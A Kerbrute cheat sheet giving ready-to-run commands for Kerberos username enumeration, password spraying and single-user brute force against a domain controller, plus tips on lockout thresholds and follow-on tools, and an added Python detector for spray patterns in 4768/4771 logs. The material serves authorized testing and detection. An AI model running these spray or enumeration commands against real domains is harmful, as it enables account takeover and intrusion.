Kerbrute Cheat Sheet
Fast Kerberos user enumeration and password spraying without LDAP.
Overview
Kerbrute abuses Kerberos pre-authentication to validate usernames and passwords against a domain controller, often without triggering standard LDAP lockouts on some configurations (it can still lock accounts). Ethics: password spraying and user enumeration are active attacks; use only on domains in authorized scope with agreed spray policies.
Install
Release binary from GitHub (authorized use)
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64
Essential commands
./kerbrute_linux_amd64 userenum -d corp.local --dc 10.10.10.1 users.txt
./kerbrute_linux_amd64 passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Password1!'
./kerbrute_linux_amd64 bruteuser -d corp.local --dc 10.10.10.1 j.doe passwords.txt
Common workflows
User enumeration:
./kerbrute userenum -d corp.local --dc 10.10.10.1 /usr/share/seclists/Usernames/xato-net-10k-usernames.txt -o valid_users.txt
Password spray (one password, many users):
./kerbrute passwordspray -d corp.local --dc 10.10.10.1 valid_users.txt 'Spring2026!'
Single-user brute force (small list):
./kerbrute bruteuser -d corp.local --dc 10.10.10.1 administrator passwords.txt
Threading and delay:
./kerbrute passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Pass' --threads 10
Flags reference
| Command / flag | Description |
|---|---|
| userenum | Valid usernames via Kerberos |
| passwordspray | One password, many users |
| bruteuser | One user, many passwords |
| -d | Domain FQDN |
| --dc | Domain controller IP |
| -o | Output file |
| --threads | Concurrency |
Tips
- Ethics: one password per spray window; align with domain lockout threshold (often 5 in 30 min).
- Kerberos userenum is quieter than LDAP anonymous bind on modern domains but still logged (4768/4771).
- Valid users feed impacket-GetNPUsers, bloodhound, and nxc workflows.
- Combine with enum4linux-ng / ldapdomaindump for full picture.
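For the defender side of the 4768/4771 tip above, this added example (not from the original cheat sheet or the Kerbrute project) flags a source address that fails Kerberos authentication against many distinct accounts inside a short window. The CSV layout, sample rows, and thresholds are assumptions constructed for illustration; status 0x6 is principal-unknown and 0x18 is pre-authentication failure.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: simplified CSV export (timestamp, event ID, client IP,
# target account, Kerberos status code). Real events carry more fields.
SAMPLE = """\
2026-03-01T09:00:01,4768,10.10.10.50,asmith,0x6
2026-03-01T09:00:01,4768,10.10.10.50,bjones,0x6
2026-03-01T09:00:02,4768,10.10.10.50,cwhite,0x6
2026-03-01T09:00:02,4768,10.10.10.50,dgreen,0x6
2026-03-01T09:05:10,4771,10.10.10.50,j.doe,0x18
2026-03-01T09:05:10,4771,10.10.10.50,k.lee,0x18
2026-03-01T09:05:11,4771,10.10.10.50,m.ray,0x18
2026-03-01T09:05:11,4771,10.10.10.50,p.kim,0x18
2026-03-01T09:07:00,4771,10.10.10.77,j.doe,0x18
2026-03-01T09:07:30,4771,10.10.10.77,j.doe,0x18
2026-03-01T11:00:00,4771,10.10.10.77,k.lee,0x18
"""

# (event ID, status) -> label. 0x6 = principal unknown, 0x18 = pre-auth failed.
PATTERNS = {("4768", "0x6"): "user-enumeration", ("4771", "0x18"): "password-spray"}

def detect(log_text, min_users=4, window=timedelta(minutes=5)):
    """Return sorted (client_ip, label, distinct_users) for every source that
    fails against >= min_users distinct accounts inside one sliding window."""
    events = defaultdict(list)  # (ip, label) -> [(time, user), ...]
    for line in log_text.splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 5:
            continue  # skip malformed rows rather than abort the run
        ts, event_id, ip, user, status = parts
        label = PATTERNS.get((event_id, status.lower()))
        if label:
            events[(ip, label)].append((datetime.fromisoformat(ts), user.lower()))
    alerts = []
    for (ip, label), hits in events.items():
        hits.sort()
        best, start = 0, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # shrink window until it spans <= `window`
            best = max(best, len({u for _, u in hits[start:end + 1]}))
        if best >= min_users:
            alerts.append((ip, label, best))
    return sorted(alerts)

if __name__ == "__main__":
    for ip, label, count in detect(SAMPLE):
        print(f"{ip}: {label} pattern, {count} distinct accounts in window")
```

Counting distinct accounts rather than raw failures keeps a single user mistyping a password (10.10.10.77 in the sample) from raising an alert.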